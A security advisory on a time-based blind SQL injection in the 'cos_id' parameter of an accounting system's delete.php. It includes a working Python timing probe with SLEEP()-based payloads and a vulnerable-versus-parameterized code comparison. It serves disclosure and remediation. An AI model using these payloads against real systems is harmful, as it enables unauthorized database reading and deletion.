Code-Projects Accounting System SQL Injection Vulnerability in Delete Function
Vulnerability
A time-based blind SQL injection vulnerability has been identified in Code-Projects Accounting System version 1.0. The flaw is in the delete.php script under the 'my_account' directory: the 'cos_id' request parameter is placed into a SQL query without being validated or bound as a query parameter, so a remote attacker can append SQL of their own choosing to it. The page does not echo query results, but the attacker can still confirm execution and extract data through timing differences (hence 'time-based blind'), leading to unauthorized database access and manipulation.
Impact
An attacker who can reach this endpoint can execute arbitrary SQL statements with the privileges of the application's database account. Using time-based blind techniques, database contents can be read out one bit at a time and modified, potentially leading to unauthorized data access, data manipulation, or even administrative access to the application.
Reproduction
To reproduce, send a GET request to '/my_account/delete.php' with a 'cos_id' value that appends a SQL expression to the expected id, for example a call to MySQL's SLEEP() joined with AND. Compare the response time with that of an unmodified request: if the response is delayed by roughly the number of seconds passed to SLEEP(), the injected SQL was executed. Because the endpoint deletes records, perform this only against a test copy of the application, and repeat each measurement so that network jitter is not mistaken for a delay.
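The timing check described above, written out as an added Python script; it is not part of the advisory or of the project's code. It assumes a MySQL/MariaDB backend (implied by SLEEP()), a lab copy of the application at TARGET, that a record with id 1 exists and id 0 does not, and that cos_id is compared either as a bare number or inside single quotes, since the advisory does not say which; all of these names and values are assumptions. The baseline request uses the nonexistent id so it deletes nothing, and because SLEEP() evaluates to 0 the injected AND condition is false, so the probe requests delete nothing either. The endpoint is still destructive, so run it only against your own copy.

```python
"""Time-based blind SQL injection probe for the cos_id GET parameter.

Added example, not code from the advisory or the project. TARGET, KNOWN_ID,
BASELINE_ID and the two payload shapes are assumptions for a local lab copy
with a MySQL/MariaDB backend.
"""
import statistics
import time
import urllib.error
import urllib.parse
import urllib.request

TARGET = "http://127.0.0.1/my_account/delete.php"  # assumed lab instance
KNOWN_ID = "1"       # assumed to exist: the probe must match one row to sleep once
BASELINE_ID = "0"    # assumed not to exist: the baseline request deletes nothing
DELAY = 5            # seconds SLEEP() adds when the injected SQL executes
SAMPLES = 3          # repeat each measurement to ride out network jitter


def build_url(base: str, cos_id: str) -> str:
    """Attach cos_id to the delete endpoint, URL-encoded (spaces, quotes, parens)."""
    return f"{base}?{urllib.parse.urlencode({'cos_id': cos_id})}"


def probes(known_id: str, delay: int) -> dict:
    """Payloads for the two most common quoting contexts (both assumed).

    'cos_id = 1 AND SLEEP(5)' sleeps once for the matching row and then
    evaluates to false, so the row is not deleted. With a non-unique match
    the delay multiplies per matching row.
    """
    return {
        "numeric": f"{known_id} AND SLEEP({delay})",
        "string": f"{known_id}' AND SLEEP({delay})-- -",
    }


def timed_get(url: str, fetch=urllib.request.urlopen, timeout: float = 30.0) -> float:
    """Wall-clock seconds for one GET.

    `fetch` is injectable so the decision logic can be exercised without a
    live server; an HTTP error still yields a usable timing.
    """
    start = time.perf_counter()
    try:
        with fetch(url, timeout=timeout) as resp:
            resp.read()
    except urllib.error.URLError:
        pass  # a 4xx/5xx or reset still tells us how long the server held the request
    return time.perf_counter() - start


def looks_injectable(baseline: list, delayed: list, delay: int) -> bool:
    """Compare medians so a single slow request cannot produce a false positive.

    Most of the requested delay (80 %) must separate the two medians.
    """
    return statistics.median(delayed) - statistics.median(baseline) >= 0.8 * delay


def check(base: str = TARGET, known_id: str = KNOWN_ID, baseline_id: str = BASELINE_ID,
          delay: int = DELAY, samples: int = SAMPLES, fetch=urllib.request.urlopen) -> dict:
    """Measure the baseline, then each probe, and report which contexts delayed."""
    baseline = [timed_get(build_url(base, baseline_id), fetch) for _ in range(samples)]
    verdict = {}
    for context, payload in probes(known_id, delay).items():
        delayed = [timed_get(build_url(base, payload), fetch) for _ in range(samples)]
        verdict[context] = looks_injectable(baseline, delayed, delay)
    return verdict


if __name__ == "__main__":
    # Only against your own lab copy: delete.php is a destructive endpoint.
    for context, hit in check().items():
        print(f"{context:8s} context: {'DELAYED (injectable)' if hit else 'no delay'}")
```

A delay that appears in only one of the two contexts tells you how cos_id is quoted, which is what a later extraction payload needs to know. If neither context delays, check first that KNOWN_ID really exists and that the test account can reach the page, because an AND-guarded SLEEP() never runs when the WHERE clause matches no row.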
Remediation
Use prepared statements (parameterized queries) so that 'cos_id' is bound as a value and never concatenated into the SQL text. Also validate the parameter before use: an identifier should be accepted only if it is an integer. Run the application with a database account limited to the privileges it actually needs, and monitor for anomalous requests, such as repeated slow responses to the same endpoint from one client, as defence in depth.
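The vulnerable pattern beside its parameterized replacement, as an added Python example rather than the project's PHP. It uses an in-memory SQLite table named cos (table and column names are assumed) in place of the application's MySQL table; SQLite has no SLEEP(), so the injected condition here is a tautology, which exposes the same root cause, parameter text spliced into the statement. The fixed version validates the id as an integer and binds it, so the same payload is rejected before any SQL runs.

```python
"""Vulnerable vs. parameterized delete for a cos_id parameter.

Added example, not the project's code. The table 'cos' and its columns are
assumed; the three sample rows are constructed for the demonstration.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the application's records."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE cos (cos_id INTEGER PRIMARY KEY, label TEXT)")
    con.executemany("INSERT INTO cos VALUES (?, ?)",
                    [(1, "rent"), (2, "utilities"), (3, "payroll")])
    return con


def remaining(con: sqlite3.Connection) -> list:
    """Ids still present, in order; shows what each delete actually did."""
    return [row[0] for row in con.execute("SELECT cos_id FROM cos ORDER BY cos_id")]


def delete_vulnerable(con: sqlite3.Connection, cos_id: str) -> list:
    """The flawed pattern: the raw request parameter becomes SQL text."""
    con.execute(f"DELETE FROM cos WHERE cos_id = {cos_id}")
    return remaining(con)


def delete_fixed(con: sqlite3.Connection, cos_id: str) -> list:
    """Validate, then bind: the value never reaches the SQL parser as syntax."""
    try:
        cos_id_int = int(cos_id)
    except (TypeError, ValueError):
        raise ValueError("cos_id must be an integer") from None
    # The driver sends the id as a bound value, separate from the statement text.
    con.execute("DELETE FROM cos WHERE cos_id = ?", (cos_id_int,))
    return remaining(con)


if __name__ == "__main__":
    print("vulnerable, payload '1 OR 1=1':", delete_vulnerable(make_db(), "1 OR 1=1"))
    print("fixed, legitimate '2':        ", delete_fixed(make_db(), "2"))
    try:
        delete_fixed(make_db(), "1 OR 1=1")
    except ValueError as exc:
        print("fixed, payload rejected:      ", exc)
```

In the application's own PHP the same shape is mysqli's prepare() followed by bind_param('i', $cos_id) and execute(), or PDO's prepare() and execute() with the id supplied as a bound parameter; in both cases the statement text contains only the placeholder. Binding alone already defeats the injection; the integer check on top of it turns a malformed id into a clean error instead of a query that matches nothing.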
